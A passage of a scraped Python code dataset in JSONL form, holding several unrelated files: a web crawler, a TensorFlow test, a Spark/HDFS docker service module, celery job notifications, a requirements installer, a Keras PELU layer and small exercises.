deque\n\nSq = deque()\nVis = set()\n\n\nurlst = [ \"https://www.yandex.com/\",\n \"http://www.baidu.com\",\n \"http://www.1688.com\",\n \"https://www.zhihu.com/question/20271508\",\n \"http://www.cnblogs.com/wupeiqi/articles/4731930.html\",\n \"http://www.baidu.com/s?\",\n 'http://news.dbanotes.net'\n ]\n\nSq.append( urlst[6] )\ncnt = 0\ncount_Sq = 1\nRurl = open( 'Result_JN_2.txt', '+w' )\nRurl.write( '\\n\\n' )\nS = ''\nwhile Sq:\n url = Sq.popleft()\n Vis = { url }\n count_Sq -= 1\n\n print( ' Already Sipdered:' + str( cnt ) + ' Spidering ----> ' + url )\n print( 'Url Numbers In The Q: ', count_Sq )\n if len( url ) > 50:\n print( '>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>' )\n print( url )\n continue\n try:\n Op = request.urlopen( url )\n cnt += 1\n \n if 'html' not in Op.getheader( 'Content-Type' ):\n #sf:log >>>>add logging common\n continue\n try:\n Dt_t = Op.read().decode( 'utf-8' )\n Dt = Dt_t.encode( encoding = 'gbk', errors = 'backslashreplace' )\n except Exception as e:\n #sf: log\n continue\n Lkre = re.compile( 'href=\"(.+?)\"' )\n Lkt = Lkre.findall( Dt_t ) \n for x in Lkt:\n if 'http' in x and x not in Vis:\n Sq.append(x)\n Rurl.write( x + '\\n' )\n count_Sq += 1\n if not count_Sq % 100:\n S = input( 'Press N to STOP:\\n' )\n print( 'Adding into the Q----> ' + x )\n\n if S == 'N':\n break\n except Exception as e:\n print( e ) \n Error = input( 'Error Press:\\n' )\n #sf: log \n continue\nRurl.close()\n\n \n\n\n\nqueue = deque( [ 'Eric', 'John', 'Michael' ] )\nqueue.append( 'Terry' )\nqueue.append( 'Graham' )\nqueue.popleft()\nqueue.popleft()\nqueue\n\n","sub_path":"JN_21.py","file_name":"JN_21.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"282344213","text":"# ==============================================================================\n# Copyright (C) 2021 Intel Corporation\n\n# SPDX-License-Identifier: Apache-2.0\n# ==============================================================================\n\"\"\"Openvino Tensorflow test for checking backend setting using rewriter config for grappler\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pytest\nimport os\nimport numpy as np\nimport shutil\nimport tensorflow as tf\ntf.compat.v1.disable_eager_execution()\nfrom tensorflow.core.protobuf import rewriter_config_pb2\nimport openvino_tensorflow\n\nfrom common import NgraphTest\n\n\nclass TestRewriterConfigBackendSetting(NgraphTest):\n\n @pytest.mark.skipif(\n not openvino_tensorflow.is_grappler_enabled(),\n reason='Rewriter config only works for grappler path')\n def test_config_updater_api(self):\n dim1 = 3\n dim2 = 4\n a = tf.compat.v1.placeholder(tf.float32, shape=(dim1, dim2), name='a')\n x = tf.compat.v1.placeholder(tf.float32, shape=(dim1, dim2), name='x')\n b = tf.compat.v1.placeholder(tf.float32, shape=(dim1, dim2), name='y')\n axpy = (a * x) + b\n\n config = tf.compat.v1.ConfigProto()\n rewriter_options = rewriter_config_pb2.RewriterConfig()\n rewriter_options.meta_optimizer_iterations = (\n rewriter_config_pb2.RewriterConfig.ONE)\n rewriter_options.min_graph_nodes = -1\n ovtf_optimizer = rewriter_options.custom_optimizers.add()\n ovtf_optimizer.name = \"ovtf-optimizer\"\n config.MergeFrom(\n tf.compat.v1.ConfigProto(\n graph_options=tf.compat.v1.GraphOptions(\n rewrite_options=rewriter_options)))\n\n with tf.compat.v1.Session(config=config) as sess:\n outval = sess.run(\n axpy,\n feed_dict={\n a: 1.5 * np.ones((dim1, dim2)),\n b: np.ones((dim1, dim2)),\n x: np.ones((dim1, dim2))\n })\n assert (outval == 2.5 * (np.ones((dim1, dim2)))).all()\n","sub_path":"test/python/test_rewriter_config_setting.py","file_name":"test_rewriter_config_setting.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"262156475","text":"\"\"\"I am particularly proud of this program, it allows you to pick a codeword, then the program will\r\ncreate a string of letters to be used as a reference to encipher your information.\"\"\"\r\n\r\n\r\n\r\ncWord = input('Cypher Word? ***ALL CAPS PLEASE***> ')\r\ncodeWord = list(cWord) #makes the codeword a list to be used\r\ncodeWord = list(dict.fromkeys(codeWord)) #removes the duplicate letters from the codeword\r\nLETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\nLETTERS = list(dict.fromkeys(LETTERS))\r\ncodeWordset = set(codeWord)\r\nLETTERSset = set(LETTERS)\r\nalphaList = list(LETTERSset - codeWordset) #removes the codeword from the alphabet\r\nalphaList.sort() #puts the remaining alphabet words into alphabetical order\r\ncypherStrip = codeWord + alphaList #adds your codeword to the beginning of the alphabet\r\nprint(cypherStrip) \r\n\r\ncypherStripstr = cypherStrip #creates a string for the main program\r\ncStrip = \"\"\r\nfor x in cypherStripstr:\r\n cStrip += x\r\n\r\nprint(cStrip)\r\n","sub_path":"CStrip.py","file_name":"CStrip.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"163187970","text":"# Copyright (C) 2016 UCSC Computational Genomics Lab\n# Copyright (C) 2016 UC Berkeley AMPLab\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport multiprocessing\nimport os\nimport subprocess\nimport time\n\nfrom toil.job import Job\n\n_log = logging.getLogger(__name__)\n_SPARK_MASTER_PORT = \"7077\"\n\ndef spawn_spark_cluster(job,\n sudo,\n numWorkers,\n cores=None,\n memory=None,\n disk=None,\n overrideLeaderIP=None):\n '''\n :param sudo: Whether this code should run docker containers with sudo.\n :param numWorkers: The number of worker nodes to have in the cluster. \\\n Must be greater than or equal to 1.\n :param cores: Optional parameter to set the number of cores per node. \\\n If not provided, we use the number of cores on the node that launches \\\n the service.\n :param memory: Optional parameter to set the memory requested per node.\n :param disk: Optional parameter to set the disk requested per node.\n :type sudo: boolean\n :type leaderMemory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type numWorkers: int\n :type cores: int\n :type memory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type disk: int or string convertable by bd2k.util.humanize.human2bytes to an int\n '''\n\n if numWorkers < 1:\n raise ValueError(\"Must have more than one worker. %d given.\" % numWorkers)\n\n leaderService = SparkService(sudo,\n cores=cores,\n memory=memory,\n disk=disk,\n overrideLeaderIP=overrideLeaderIP)\n leaderIP = job.addService(leaderService)\n for i in range(numWorkers):\n job.addService(WorkerService(leaderIP,\n sudo,\n cores=cores,\n disk=disk,\n memory=memory),\n parentService=leaderService)\n\n return leaderIP\n\n#\n# FIXME: Where should this go?\n# See discussion in https://github.com/BD2KGenomics/toil-scripts/pull/190.\n# @benedictpaten thinks this should go in toil. If so, where in toil?\n#\n# @jvivian has been tagged to resolve this at a later point in time\n#\ndef _docker_call(work_dir,\n tool_parameters,\n tool,\n java_opts=None,\n outfile=None,\n sudo=False,\n docker_parameters=None,\n check_output=False,\n no_rm=False):\n \"\"\"\n Makes subprocess call of a command to a docker container.\n\n tool_parameters: list An array of the parameters to be passed to the tool\n tool: str Name of the Docker image to be used (e.g. quay.io/ucsc_cgl/samtools)\n java_opts: str Optional commands to pass to a java jar execution. (e.g. '-Xmx15G')\n outfile: file Filehandle that stderr will be passed to\n sudo: bool If the user wants the docker command executed as sudo\n \"\"\"\n rm = '--rm'\n if no_rm:\n rm = ''\n\n base_docker_call = ('docker run %s --log-driver=none -v %s:/data' % (rm, work_dir)).split()\n\n if sudo:\n base_docker_call = ['sudo'] + base_docker_call\n if java_opts:\n base_docker_call = base_docker_call + ['-e', 'JAVA_OPTS={}'.format(java_opts)]\n if docker_parameters:\n base_docker_call = base_docker_call + docker_parameters\n\n _log.warn(\"Calling docker with %s.\" % \" \".join(base_docker_call + [tool] + tool_parameters))\n\n try:\n if outfile:\n subprocess.check_call(base_docker_call + [tool] + tool_parameters, stdout=outfile)\n else:\n if check_output:\n return subprocess.check_output(base_docker_call + [tool] + tool_parameters)\n else:\n subprocess.check_call(base_docker_call + [tool] + tool_parameters)\n\n except subprocess.CalledProcessError:\n raise RuntimeError('docker command returned a non-zero exit status. Check error logs.')\n except OSError:\n raise RuntimeError('docker not found on system. Install on all nodes.')\n\n\ndef _checkContainerStatus(sparkContainerID,\n hdfsContainerID,\n sparkNoun='leader',\n hdfsNoun='namenode'):\n\n containers = subprocess.check_output([\"docker\", \"ps\", \"-q\"])\n\n # docker ps emits shortened versions of the hash\n # these shortened hashes are 12 characters long\n shortSpark = sparkContainerID[0:11]\n shortHdfs = hdfsContainerID[0:11]\n\n if ((sparkContainerID not in containers and\n shortSpark not in containers) or\n (hdfsContainerID not in containers and\n shortHdfs not in containers)):\n raise RuntimeError('Lost both Spark %s and HDFS %s.' % (sparkNoun, hdfsNoun))\n elif sparkContainerID not in containers and shortSpark not in containers:\n raise RuntimeError('Lost Spark %s. %r' % sparkNoun)\n elif hdfsContainerID not in containers and shortHdfs not in containers:\n raise RuntimeError('Lost HDFS %s. %r' % hdfsNoun)\n else:\n return True\n \n\nclass SparkService(Job.Service):\n \"\"\"\n A Service job that spins up a Spark cluster that child jobs can then attach\n to. If the job that spawns this job is run with `checkpoint = True`, then\n this service will robustly restart the Spark cluster upon the loss of any\n nodes in the cluster.\n \"\"\"\n\n def __init__(self,\n sudo,\n memory=None,\n disk=None,\n cores=None,\n overrideLeaderIP=None):\n \"\"\"\n :param sudo: Whether this code should run docker containers with sudo.\n :param memory: The amount of memory to be requested for the Spark leader. Optional.\n :param disk: The amount of disk to be requested for the Spark leader. Optional.\n :param cores: Optional parameter to set the number of cores per node. \\\n If not provided, we use the number of cores on the node that launches \\\n the service.\n :type sudo: boolean\n :type memory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type disk: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type cores: int\n \"\"\"\n self.sudo = sudo\n\n if cores is None:\n cores = multiprocessing.cpu_count()\n\n self.hostname = overrideLeaderIP\n\n Job.Service.__init__(self, memory=memory, cores=cores, disk=disk)\n\n\n def start(self, fileStore):\n \"\"\"\n Start spark and hdfs master containers\n\n :param fileStore: Unused\n \"\"\"\n\n if self.hostname is None:\n self.hostname = subprocess.check_output([\"hostname\", \"-f\",])[:-1]\n\n _log.info(\"Started Spark master container.\")\n self.sparkContainerID = _docker_call(no_rm = True,\n work_dir = os.getcwd(),\n tool = \"quay.io/ucsc_cgl/apache-spark-master:1.5.2\",\n docker_parameters = [\"--net=host\",\n \"-d\",\n \"-v\", \"/mnt/ephemeral/:/ephemeral/:rw\",\n \"-e\", \"SPARK_MASTER_IP=\"+self.hostname,\n \"-e\", \"SPARK_LOCAL_DIRS=/ephemeral/spark/local\",\n \"-e\", \"SPARK_WORKER_DIR=/ephemeral/spark/work\"],\n tool_parameters = [self.hostname],\n sudo = self.sudo,\n check_output = True)[:-1]\n _log.info(\"Started HDFS Datanode.\")\n self.hdfsContainerID = _docker_call(no_rm = True,\n work_dir = os.getcwd(),\n tool = \"quay.io/ucsc_cgl/apache-hadoop-master:2.6.2\",\n docker_parameters = [\"--net=host\",\n \"-d\"],\n tool_parameters = [self.hostname],\n sudo = self.sudo,\n check_output = True)[:-1]\n\n return self.hostname\n\n\n def stop(self, fileStore):\n \"\"\"\n Stop and remove spark and hdfs master containers\n\n fileStore: Unused\n \"\"\"\n\n sudo = []\n if self.sudo:\n sudo = [\"sudo\"]\n \n subprocess.call(sudo + [\"docker\", \"exec\", self.sparkContainerID, \"rm\", \"-r\", \"/ephemeral/spark\"])\n subprocess.call(sudo + [\"docker\", \"stop\", self.sparkContainerID])\n subprocess.call(sudo + [\"docker\", \"rm\", self.sparkContainerID])\n _log.info(\"Stopped Spark master.\")\n\n subprocess.call(sudo + [\"docker\", \"stop\", self.hdfsContainerID])\n subprocess.call(sudo + [\"docker\", \"rm\", self.hdfsContainerID])\n _log.info(\"Stopped HDFS namenode.\")\n\n return\n\n\n def check(self):\n \"\"\"\n Checks to see if Spark master and HDFS namenode are still running.\n \"\"\"\n \n status = _checkContainerStatus(self.sparkContainerID, self.hdfsContainerID)\n\n return status\n\nclass WorkerService(Job.Service):\n \"\"\"\n Service Job that implements the worker nodes in a Spark/HDFS cluster.\n Should not be called outside of `SparkService`.\n \"\"\"\n \n def __init__(self, masterIP, sudo, memory=None, cores=None, disk=None):\n \"\"\"\n :param sudo: Whether this code should run docker containers with sudo.\n :param memory: The memory requirement for each node in the cluster. Optional.\n :param disk: The disk requirement for each node in the cluster. Optional.\n :param cores: Optional parameter to set the number of cores per node. \\\n If not provided, we use the number of cores on the node that launches \\\n the service.\n :type sudo: boolean\n :type memory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type disk: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type cores: int\n \"\"\"\n\n self.masterIP = masterIP\n self.sudo = sudo\n\n if cores is None:\n cores = multiprocessing.cpu_count()\n \n Job.Service.__init__(self, memory=memory, cores=cores, disk=disk)\n\n\n def start(self, fileStore):\n \"\"\"\n Start spark and hdfs worker containers\n\n :param fileStore: Unused\n \"\"\"\n\n # start spark and our datanode\n self.sparkContainerID = _docker_call(no_rm = True,\n work_dir = os.getcwd(),\n tool = \"quay.io/ucsc_cgl/apache-spark-worker:1.5.2\",\n docker_parameters = [\"--net=host\", \n \"-d\",\n \"-v\", \"/mnt/ephemeral/:/ephemeral/:rw\",\n \"-e\", \"\\\"SPARK_MASTER_IP=\"+self.masterIP+\":\"+_SPARK_MASTER_PORT+\"\\\"\",\n \"-e\", \"SPARK_LOCAL_DIRS=/ephemeral/spark/local\",\n \"-e\", \"SPARK_WORKER_DIR=/ephemeral/spark/work\"],\n tool_parameters = [self.masterIP+\":\"+_SPARK_MASTER_PORT],\n sudo = self.sudo,\n check_output = True)[:-1]\n self.__start_datanode()\n \n # fake do/while to check if HDFS is up\n hdfs_down = True\n retries = 0\n while hdfs_down and (retries < 5):\n\n _log.info(\"Sleeping 30 seconds before checking HDFS startup.\")\n time.sleep(30)\n clusterID = \"\"\n try:\n clusterID = check_output([\"docker\",\n \"exec\",\n self.hdfsContainerID,\n \"grep\",\n \"clusterID\",\n \"-R\",\n \"/opt/apache-hadoop/logs\"])\n except:\n # grep returns a non-zero exit code if the pattern is not found\n # we expect to not find the pattern, so a non-zero code is OK\n pass\n\n if \"Incompatible\" in clusterID:\n _log.warning(\"Hadoop Datanode failed to start with: %s\", clusterID)\n _log.warning(\"Retrying container startup, retry #%d.\", retries)\n retries += 1\n\n _log.warning(\"Removing ephemeral hdfs directory.\")\n check_call([\"docker\",\n \"exec\",\n self.hdfsContainerID,\n \"rm\",\n \"-rf\",\n \"/ephemeral/hdfs\"])\n\n _log.warning(\"Killing container %s.\", self.hdfsContainerID)\n check_call([\"docker\",\n \"kill\",\n self.hdfsContainerID])\n\n # todo: this is copied code. clean up!\n _log.info(\"Restarting datanode.\")\n self.__start_datanode()\n\n else:\n _log.info(\"HDFS datanode started up OK!\")\n hdfs_down = False\n\n if retries >= 5:\n raise RuntimeError(\"Failed %d times trying to start HDFS datanode.\" % retries)\n\n return\n\n\n def __start_datanode(self):\n \"\"\"\n Launches the Hadoop datanode.\n \"\"\"\n self.hdfsContainerID = _docker_call(no_rm = True,\n work_dir = os.getcwd(),\n tool = \"quay.io/ucsc_cgl/apache-hadoop-worker:2.6.2\",\n docker_parameters = [\"--net=host\",\n \"-d\",\n \"-v\", \"/mnt/ephemeral/:/ephemeral/:rw\"],\n tool_parameters = [self.masterIP],\n sudo = self.sudo,\n check_output = True)[:-1]\n\n\n def stop(self, fileStore):\n \"\"\"\n Stop spark and hdfs worker containers\n\n :param fileStore: Unused\n \"\"\"\n\n sudo = []\n if self.sudo:\n sudo = ['sudo']\n\n subprocess.call(sudo + [\"docker\", \"exec\", self.sparkContainerID, \"rm\", \"-r\", \"/ephemeral/spark\"])\n subprocess.call(sudo + [\"docker\", \"stop\", self.sparkContainerID])\n subprocess.call(sudo + [\"docker\", \"rm\", self.sparkContainerID])\n _log.info(\"Stopped Spark worker.\")\n\n subprocess.call(sudo + [\"docker\", \"exec\", self.hdfsContainerID, \"rm\", \"-r\", \"/ephemeral/hdfs\"])\n subprocess.call(sudo + [\"docker\", \"stop\", self.hdfsContainerID])\n subprocess.call(sudo + [\"docker\", \"rm\", self.hdfsContainerID])\n _log.info(\"Stopped HDFS datanode.\")\n\n return\n\n\n def check(self):\n \"\"\"\n Checks to see if Spark worker and HDFS datanode are still running.\n \"\"\"\n\n status = _checkContainerStatus(self.sparkContainerID,\n self.hdfsContainerID,\n sparkNoun='worker',\n hdfsNoun='datanode')\n \n return status\n","sub_path":"src/toil/lib/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":16657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"452878031","text":"import celery\nfrom ptmworker.helpers import upload_helpers\nfrom ptmscout.database import experiment, modifications, jobs\nfrom ptmscout.config import strings, settings\nfrom ptmscout.utils import mail\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_batch_annotate_job(stats, job_id):\n protein_cnt, error_cnt = stats\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.batch_annotation_finished_subject\n message = strings.batch_annotation_finished_message % (job.name, protein_cnt, error_cnt, job.result_url)\n \n mail.celery_send_mail([job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_experiment_export_job(job_id):\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.experiment_export_finished_subject\n message = strings.experiment_export_finished_message % (job.name, job.result_url)\n \n mail.celery_send_mail([job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_mcam_export_job(job_id):\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.mcam_enrichment_finished_subject\n message = strings.mcam_enrichment_finished_message % (job.name, job.result_url)\n \n mail.celery_send_mail([job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_experiment_import(exp_id):\n exp = experiment.getExperimentById(exp_id, check_ready=False, secure=False)\n exp.job.finish()\n exp.job.save()\n\n peptides = modifications.countMeasuredPeptidesForExperiment(exp_id)\n proteins = modifications.countProteinsForExperiment(exp_id)\n exp_errors = experiment.countErrorsForExperiment(exp_id)\n\n error_log_url = \"%s/errors\" % (exp.job.result_url)\n \n subject = strings.experiment_upload_finished_subject\n message = strings.experiment_upload_finished_message % (exp.name, peptides, proteins, exp_errors, error_log_url)\n \n mail.celery_send_mail([exp.job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_annotation_upload_job(job_id, total, errors):\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.annotation_upload_finished_subject\n message = strings.annotation_upload_finished_message % (job.name, total, len(errors), job.result_url)\n \n for err in errors:\n message += \"%s\\n\" % ( err )\n \n mail.celery_send_mail([job.user.email], subject, message)\n \n\n@celery.task\n@upload_helpers.transaction_task\ndef notify_job_failed(job_id, exc, stack_trace):\n job = jobs.getJobById(job_id)\n job.fail(stack_trace)\n job.save()\n \n subject = strings.job_failed_subject\n message = strings.job_failed_message % (job.name, job.stage, \"Exception: \" + str(exc), settings.issueTrackerUrl)\n \n mail.celery_send_mail([job.user.email, settings.adminEmail], subject, message)\n \n \n\n@celery.task\n@upload_helpers.transaction_task\ndef set_job_status(job_id, status):\n job = jobs.getJobById(job_id)\n job.status = status\n job.save()\n\n@celery.task\n@upload_helpers.transaction_task\ndef set_job_stage(job_id, stage, max_value):\n job = jobs.getJobById(job_id)\n job.stage = stage\n job.progress = 0\n job.max_progress = max_value\n job.save()\n\n@celery.task\n@upload_helpers.transaction_task\ndef set_job_progress(job_id, value, max_value):\n job = jobs.getJobById(job_id)\n job.progress = value\n job.max_progress = max_value\n job.save()\n\n@celery.task\n@upload_helpers.transaction_task\ndef increment_job_progress(job_id):\n job = jobs.getJobById(job_id)\n job.progress = job.progress+1\n job.save()\n\n","sub_path":"ptmscout_web/ptmworker/notify_tasks.py","file_name":"notify_tasks.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"593899636","text":"# http://oj.leetcode.com/problems/combination-sum-ii/\nclass Solution:\n\tdef find(self, candidates, target, a, s, i):\n\t\ttemp = s[::]\n\t\tif sum(temp) == target:\n\t\t\tif a.count(temp) == 0:\n\t\t\t\ta.append(temp)\n\t\t\treturn a\n\t\tfor j in range (i + 1, len(candidates)):\n\t\t\tif sum(temp) + candidates[j] == target:\n\t\t\t\ttemp.append(candidates[j])\n\t\t\t\tif a.count(temp) == 0:\n\t\t\t\t\ta.append(temp)\n\t\t\telif sum(temp) + candidates[j] < target:\n\t\t\t\ttemp1 = temp[::]\n\t\t\t\ttemp1.append(candidates[j])\n\t\t\t\tself.find(candidates, target, a, temp1, j)\n\t\t\telse:\n\t\t\t\tbreak\n\n\t# @param candidates, a list of integers\n\t# @param target, integer\n\t# @return a list of lists of integers\n\tdef combinationSum2(self, candidates, target):\n\t\ta = []\n\t\tcandidates.sort()\n\t\tfor i in range (0, len(candidates)):\n\t\t\ts = [candidates[i]]\n\t\t\tself.find(candidates, target, a, s, i)\n\t\treturn a\n\na = [10, 1, 2, 7, 6, 1, 5]\nt = 8\nb = [1, 1]\ns = Solution()\nprint(s.combinationSum2(a, t))\nprint(s.combinationSum2(b, 1))\n","sub_path":"combination-sum-ii.py","file_name":"combination-sum-ii.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"26981957","text":"import argparse\nfrom collections import OrderedDict\nimport logging\nimport os\nimport textwrap\n\nfrom pip.index import PackageFinder\nfrom pip.req import InstallRequirement, RequirementSet\nfrom pip.locations import build_prefix, src_prefix\n\nfrom . import settings\n\n# in this case create the 'pundler' logger, but if called again from elsewhere will give another reference to this one\nlogger = logging.getLogger('pundler')\nlogger.setLevel(logging.DEBUG)\n\n# change your formatting all from one place, or from the calling program when this gets turned into library code\nformatter = logging.Formatter(fmt = '%(message)s')\n\n#set it up to log to the console for now\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.DEBUG)\nconsole_handler.setFormatter(formatter)\nlogger.addHandler(console_handler)\n\n\ndef get_requirement_file():\n \"\"\"\n Get the \"best\" requirements file we can find\n \"\"\"\n for filename in settings.REQUIREMENTS_SOURCE_FILES:\n if os.path.exists(filename):\n return filename\n logger.warn(\n textwrap.dedent(\n \"\"\"Sorry, I couldn't find a requirements.yml or\n requirements.in!\"\"\")\n )\n\n\ndef get_requirements(filename):\n if filename is not None:\n logger.info(\"processing %s\" % filename)\n with open(filename, \"r\") as f:\n for line in f.readlines():\n line = line.strip()\n yield line\n\n\ndef install(args, lock_filename=\"requirements.txt\"):\n deps = OrderedDict()\n\n filename = get_requirement_file()\n for line in get_requirements(filename):\n line = line.strip()\n deps[line] = []\n\n requirement_set = RequirementSet(\n build_dir=build_prefix,\n src_dir=src_prefix,\n download_dir=None)\n\n requirement = InstallRequirement.from_line(line, None)\n\n requirement_set.add_requirement(requirement)\n\n install_options = []\n global_options = []\n # TODO: specify index_urls from optional requirements.yml\n finder = PackageFinder(\n find_links=[],\n index_urls=[\"http://pypi.python.org/simple/\"]\n )\n\n requirement_set.prepare_files(finder, force_root_egg_info=False, bundle=False)\n requirement_set.install(install_options, global_options)\n\n for package in requirement_set.requirements.values():\n deps[line].append(\"%s==%s\" % (package.name, package.installed_version))\n\n for package in requirement_set.successfully_installed:\n deps[line].append(\"%s==%s\" % (package.name, package.installed_version))\n\n deps[line] = set(deps[line])\n\n package_set = set([])\n\n with open(lock_filename, \"w\") as output:\n output.write(\"# this file generated from '%s' by pundler:\\n\" % (filename,))\n for requested_package in deps:\n output.write(\"# requirement '%s' depends on:\\n\" % (requested_package,))\n for dependency in deps[requested_package]:\n logger.info(\"dependency %s\" % dependency)\n if dependency not in package_set:\n dependency = dependency.lower()\n package_set.add(dependency)\n output.write(\"%s\\n\" % (dependency,))\n else:\n output.write(\"#%s\\n\" % (dependency,))\n output.write(\"\\n\")\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='Manage python requirements')\n # parser.add_argument('integers', metavar='N', type=int, nargs='+',\n # help='an integer for the accumulator')\n # parser.add_argument('--sum', dest='accumulate', action='store_const',\n # const=sum, default=max,\n # help='sum the integers (default: find the max)')\n subparsers = parser.add_subparsers(title='subcommands',\n description='valid subcommands',\n help='additional help')\n install_parser = subparsers.add_parser('install')\n install_parser.set_defaults(func=install)\n return parser\n\n\ndef main():\n args = get_parser().parse_args()\n args.func(args)\n","sub_path":"pundler/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"84639069","text":"file = open('C:\\\\Users\\\\x1c\\\\Desktop\\\\SVNSELF\\\\Desktop\\\\SS2\\\\dome.cpp',\n encoding=\"gbk\")\narr = []\nwhile 1:\n line = file.readline()\n if not line:\n break\n line = line.strip()\n linevalue = (line[0:line.find(' ', 1)])\n arr.append(linevalue)\n\n\nfilename = 'C:\\\\Users\\\\x1c\\\\Desktop\\\\SVNSELF\\\\Desktop\\\\SS2\\\\SS2-Struct.xml'\nwith open(filename,'w') as fileobject: #使用‘w’来提醒python用写入的方式打开\n fileobject.write(''\n '\\n')\n\n\nfor i in range(0, len(arr)): \n with open(filename,'a') as fileobject: #使用‘a’来提醒python用附加模式的方式打开\n fileobject.write(\"\\n\t\"\n \"\\n\t\")\nwith open(filename,'a') as fileobject: #使用‘a’来提醒python用附加模式的方式打开\n fileobject.write('\\n')","sub_path":"demo/xmlread (3).py","file_name":"xmlread (3).py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"582856420","text":"from .. import initializations\nfrom keras.engine import Layer\nfrom keras.utils.generic_utils import get_custom_objects\nfrom .. import backend as K\nimport numpy as np\n\n\nclass PELU(Layer):\n \"\"\"Parametric Exponential Linear Unit.\n It follows:\n `f(x) = alphas * (exp(x / betas) - 1) for x < 0`,\n `f(x) = (alphas / betas) * x for x >= 0`,\n where `alphas` & `betas` are learned arrays with the same shape as x.\n # Input shape\n Arbitrary. Use the keyword argument `input_shape`\n (tuple of integers, does not include the samples axis)\n when using this layer as the first layer in a model.\n # Output shape\n Same shape as the input.\n # Arguments\n alphas_init: initialization function for the alpha variable weights.\n betas_init: initialization function for the beta variable weights.\n weights: initial weights, as a list of a single Numpy array.\n shared_axes: the axes along which to share learnable\n parameters for the activation function.\n For example, if the incoming feature maps\n are from a 2D convolution\n with output shape `(batch, height, width, channels)`,\n and you wish to share parameters across space\n so that each filter only has one set of parameters,\n set `shared_axes=[1, 2]`.\n # References\n - [PARAMETRIC EXPONENTIAL LINEAR UNIT FOR DEEP CONVOLUTIONAL NEURAL NETWORKS](https://arxiv.org/abs/1605.09332v3)\n \"\"\"\n\n def __init__(self, alphas_init='one', betas_init='one', weights=None, shared_axes=None, **kwargs):\n self.supports_masking = True\n self.alphas_init = initializations.get(alphas_init)\n self.betas_init = initializations.get(betas_init)\n self.initial_weights = weights\n if not isinstance(shared_axes, (list, tuple)):\n self.shared_axes = [shared_axes]\n else:\n self.shared_axes = list(shared_axes)\n super(PELU, self).__init__(**kwargs)\n\n def build(self, input_shape):\n param_shape = list(input_shape[1:])\n self.param_broadcast = [False] * len(param_shape)\n if self.shared_axes[0] is not None:\n for i in self.shared_axes:\n param_shape[i - 1] = 1\n self.param_broadcast[i - 1] = True\n\n # Initialised as ones to emulate the default ELU\n self.alphas = self.alphas_init(param_shape,\n name='{}_alphas'.format(self.name))\n self.betas = self.betas_init(param_shape,\n name='{}_betas'.format(self.name))\n\n self.trainable_weights = [self.alphas, self.betas]\n\n if self.initial_weights is not None:\n self.set_weights(self.initial_weights)\n del self.initial_weights\n\n def call(self, x, mask=None):\n if K.backend() == 'theano':\n pos = K.relu(x) * (K.pattern_broadcast(self.alphas, self.param_broadcast) /\n K.pattern_broadcast(self.betas, self.param_broadcast))\n neg = (K.pattern_broadcast(self.alphas, self.param_broadcast) *\n (K.exp((-K.relu(-x)) / K.pattern_broadcast(self.betas, self.param_broadcast)) - 1))\n else:\n pos = K.relu(x) * self.alphas / self.betas\n neg = self.alphas * (K.exp((-K.relu(-x)) / self.betas) - 1)\n return neg + pos\n\n def get_config(self):\n config = {'alphas_init': self.alphas_init.__name__,\n 'betas_init': self.betas_init.__name__}\n base_config = super(PELU, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\nget_custom_objects().update({\"PELU\": PELU})\n","sub_path":"keras_contrib/layers/advanced_activations.py","file_name":"advanced_activations.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"608816503","text":"import time\nimport boto3\nimport gblevntdata_rshift_config as db_config\n\nec2_resource = boto3.resource('ec2',\n 